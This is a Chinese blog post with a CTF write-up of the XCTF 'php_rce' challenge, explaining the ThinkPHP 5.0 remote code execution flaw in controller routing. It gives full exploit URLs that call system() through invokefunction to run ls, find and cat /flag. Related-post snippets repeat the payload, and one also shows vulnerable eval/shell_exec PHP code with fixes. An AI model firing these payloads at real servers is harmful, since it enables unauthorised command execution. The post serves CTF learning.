XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)

最新推荐文章于 2024-07-11 11:08:56 发布
原创 最新推荐文章于 2024-07-11 11:08:56 发布 · 1.3k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #thinkphp #远程命令执行

本文详细介绍了ThinkPHP5.0框架的一个严重远程代码执行漏洞,该漏洞允许攻击者通过构造特定URL来调用任意类方法,如使用`invokefunction`反射函数执行系统命令。攻击者可以利用此漏洞执行ls、find等系统命令,查找并读取敏感文件,例如找到并显示flag文件内容。解决该问题的关键在于更新到安全版本并加强输入验证。

先访问题目场景:
在这里插入图片描述

主页提示我们:网页使用的是ThinkPHP框架,版本为5.0
这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。
攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
在这里插入图片描述
通过s就可以获取路由信息,程序未对控制器进行过滤,导致攻击者可以用 \(反斜杠)调用任意类方法。其中:

  1. index/是对应的模块
  2. \think\app 以反斜线开头,这就是我们想要实例化的类
  3. /invokefunction是让\think\app类想要调用的方法,
  4. function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1是对应invokefunction的参数。

对于选用invokefunction这个函数,是因为它是个反射函数,可以方便的调用任何函数。
关于如何解析把function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1这些解析成invokefuncition参数的,可以看下Request.php 对应的param函数。
需要注意的是不同版本的ThinkPHP,对应的文件、类名有些差异。当然还有很多的攻击方式,只要你去文件找到可以实例化的类构造相应的payload就行。

运行shell命令ls查看当前目录下的文件:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
在这里插入图片描述
可以看到当前目录下的文件
查找根目录下的文件:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
参数/是根目录的意思,这表示显示根目录下的文件:
在这里插入图片描述
也可以使用find命令查找flag:

find / -name flag

或者

find / -name '*flag'

攻击:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag
在这里插入图片描述
都可以找到flag文件所在的位置
之后使用cat命令查看/flag文件内容:

cat /flag

攻击:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
在这里插入图片描述
得到flag:flag{thinkphp5_rce}

ctf-攻防世界-webphp_rce
一只菜鸟的博客
11-10 1519
涉及到知识盲点了,感恩百度&前辈大佬们 打开环境,发现ThinkPHP V5框架,百度看到有命令执行漏洞 ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园 看不懂但是照猫画虎,参考文章利用方法,构建url寻找flag文件 大小写敏感,是linux系统, 构造find -name "flag"命令: 111.200.241.244:61290/index.php?s=index/think\app/invokefunction&function=
XCTF篇:Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞复现
小明师傅博客
06-21 1449
3.php_rce 感觉是让我找ThinkPHP V5漏洞?? 但我连ThinkPHP V5是什么都不知道== 对我这小白一点也不友好 搜索发现框架和cms的区别 框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西. 而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住. 两者的优缺点是: 框架相对比较灵
XCTF-攻防世界CTF平台-Web——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过)
Onlyone_1314的博客
01-15 3865
目录标题方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开题目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
XCTF-攻防世界CTF平台-Web——17、ics-05php://filter 协议、preg_replace函数命令执行
Onlyone_1314的博客
01-01 3396
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
XCTF-攻防世界CTF平台-Crypto——4、flag_in_your_hand1(前端输入加密)
Onlyone_1314的博客
09-12 2028
下载文件之后,发现是一道前端的题目:有一个index.html文件和一个script-min.js文件: 运行html文件: 要求输入一个Token,然后点Get flag!按钮: 代码逻辑就是输入一个字符串,然后经过计算对比得到正确的flag 我们先查看源代码: <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body {
XCTF-攻防世界CTF平台-Web——15、easytornado(SSTI服务器模板注入、Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 3067
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
XCTF-攻防世界CTF平台-Reverse逆向——56、tar-tar-binks(Mac平台下的64位动态链接共享库.dylib逆向)
Onlyone_1314的博客
10-30 1382
目录标题一、解压缩二、查看文件三、分析程序四、程序主要逻辑:五、逆向思路:步骤一:步骤二:六、解密代码: 题目提供了两个文件flag.tar和libarchive.dylib 一、解压缩   flag.tar是一个不能直接在windwos下解压缩的文件,直接用tar -xvf flag.tar命令解压缩:   提示不是一个tar压缩文件,但是其中包含了一个flag.txt的文件头,解压缩出了一个flag.txt文件。   再用file flag.tar命令来查看文件的格式:   是一个POSIX格式的t
xctf-Android-攻防世界平台移动安全挑战赛解题思路与详细步骤记录_Android移动应用安全逆向工程漏洞挖掘CTF竞赛writeup二进制分析动态调试静态分析.zip
最新发布
12-03
xctf-Android-攻防世界平台移动安全挑战赛解题思路与详细步骤记录_Android移动应用安全逆向工程漏洞挖掘CTF竞赛writeup二进制分析动态调试静态分析.zip
XCTF攻防世界misc难度一所有整合wp
07-19
标签MISC CTF 攻防世界强调了文档内容的实践性和针对性,其中MISC代表了CTF竞赛中的杂项别,CTF是指捕获旗帜,它是一种计算机安全竞赛,而攻防世界则是举办该型竞赛的平台名称。这些标签帮助信息安全爱好者在...
CTF-攻防世界web新手入门篇
热门推荐
weixin_45923850的博客
04-14 1万+
CTF练习题目
XCTF-攻防世界-密码学crypto-新手练习区-writeup
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
XCTF php_rce
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 661
ThinkPHP 5.X远程命令执行漏洞 利用system函数远程命令执行 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 写入shell ?s=/index/\think\app/invokefunction&funct...
CTFXCTF攻防世界web新手区
qq_45461251的博客
12-19 840
1、view source F12查看源代码即可。 2、get_post 第一步题目提示: 请用GET方式提交一个名为a,值为1的变量 于是更改URL为: 111.198.29.45:43088/?a=1 又根据提示有: 请再以POST方式随便提交一个名为b,值为2的变量 所以用火狐浏览器的插件hackbar: 3、robots 根据提示考察robots协议,于是更改URL为: 1...
wp-xctf-php_rce
bin789456的博客
10-25 173
wp 题目本身就在提示php版本问题,有意思就在于这道题可以告诉我们查找漏洞的思想,我们可以在github上看看 这里我们只知道是5版本,用这里给出的测试语句 仅发出get的参数即可 版本出现 是5.0.21之前的版本,还没有进行修复。 利用成功 ...
XCTF-攻防世界-密码学crypto-高手进阶区-writeup
Ryannn_的博客
10-25 9262
0x00 你猜猜 我们刚刚拦截了,敌军的文件传输获取一份机密文件,请君速速破解。 密文: 504B03040A0001080000626D0A49F4B5091F1E0000001200000008000000666C61672E7478746C9F170D35D0A45826A03E161FB96870EDDFC7C89A11862F9199B4CD78E7504B01023F000A0...
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 1236
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
网络攻防路6-xctf php_rce
大紫明宫空离境
11-15 294
目录 一 ,php_rce 二,解题 三 ,总结 一 ,php_rce 这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 二,解题 1 进入试题 2 访问http://220.249.52.133:38152/index.ph
XCTF web php_rce (thinkphp)
H4ppyD0g的博客
08-28 372
thinkphp5.05.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受 影响的版本包括5.05.1版本。 测试是否可以getshell ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls 成功返回信息,确定存在漏洞 接着查询有flag的文件 ?s=index/think\app/invoke
CTF php RCE (四)
2301_81040377的博客
07-11 968
这两个东西呢相当的好玩,也能够达到一下小极限的操作随便找了个例题,观察一下,限制了字符长度,以及无字母数字RCE
xctf新手web php-rce
03-21
### XCTF Web PHP RCE 漏洞利用新手教程 #### 背景介绍 PHP远程代码执行(Remote Code Execution, RCE漏洞通常允许攻击者通过特定输入在服务器上运行任意命令。这种型的漏洞常见于未正确过滤用户输入的情况下调用了危险函数,例如 `eval()`、`assert()` 或反序列化操作等[^1]。 #### 常见的PHP RCE触发方式 以下是几种常见的PHP RCE触发机制及其原理: 1. **Eval 函数滥用** 当应用程序使用 `eval()` 来动态执行字符串形式的PHP代码时,如果该字符串来源于不可信的用户输入,则可能导致RCE漏洞的发生。例如: ```php <?php $input = $_GET[&#39;code&#39;]; eval($input); ?> ``` 上述代码片段中,任何传入到参数 `code` 的数据都会被当作PHP脚本执行[^2]。 2. **系统命令注入** 如果程序错误地将未经验证的数据传递给诸如 `exec()`, `shell_exec()`, `passthru()`, 和 `system()` 这样的函数,也可能引发似的后果。 3. **对象反序列化问题** 反序列化的风险在于它可能恢复恶意构造的对象实例,从而操纵内部逻辑或者访问敏感资源。比如当开发者依赖自定义魔术方法(`__wakeup`, `__destruct`)来处理复杂状态转换的时候特别需要注意安全性设计缺陷带来的隐患。 #### 解决方案与防护措施建议 为了防止此安全事件发生,在开发过程中应该遵循最佳实践原则并采取必要的防御手段: - 避免完全信任来自外部环境的信息流; - 对所有进入系统的变量实施严格的白名单校验策略而非黑名单排除法; - 替代高危内置功能以更稳健的方式实现相同业务需求; - 定期审查现有架构是否存在潜在弱点并通过单元测试加以确认其健壮程度。 #### 示例代码分析 下面给出一段可能存在安全隐患的实际应用例子以及如何修复它的办法: 假设有一个简单的留言板服务端接口如下所示: ```php <?php if(isset($_POST["cmd"])){ shell_exec($_POST["cmd"]); } ?> ``` 这段原始版本很容易遭受非法操控因为直接把客户端提交过来的内容作为操作系统指令去执行没有任何保护机制存在其中。我们可以通过修改后的版本展示改进之处: 修正版一:采用预定义选项列表限制可选动作范围 ```php <?php $allowed_commands=[&#39;ls&#39;,&#39;-la&#39;,&#39;pwd&#39;];//仅允许列举目录结构查看当前路径两项基本查询行为 $input=trim(filter_input(INPUT_POST,&#39;cmd&#39;,FILTER_SANITIZE_STRING)); if(in_array($input,$allowed_commands)){ echo shell_exec($input); }else{ die(&#39;Invalid Command&#39;); } ?> ``` 修正版二:运用正则表达式匹配限定字符集构成合法请求模式 ```php <?php $pattern=&#39;/^[a-zA-Z0-9\s]+$/&#39;; //只接受字母数字空白符组成的简单语句 $input=filter_input(INPUT_POST,&#39;cmd&#39;,FILTER_DEFAULT); if(preg_match($pattern,$input)){ echo escapeshellarg(shell_exec($input)); } else { die(&#39;Malformed Input Detected!&#39;); } ?> ``` 以上两种不同的改写方向均能有效降低原生脆弱性的暴露概率同时兼顾功能性保留部分必要交互能力满足实际场景下的平衡考量。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值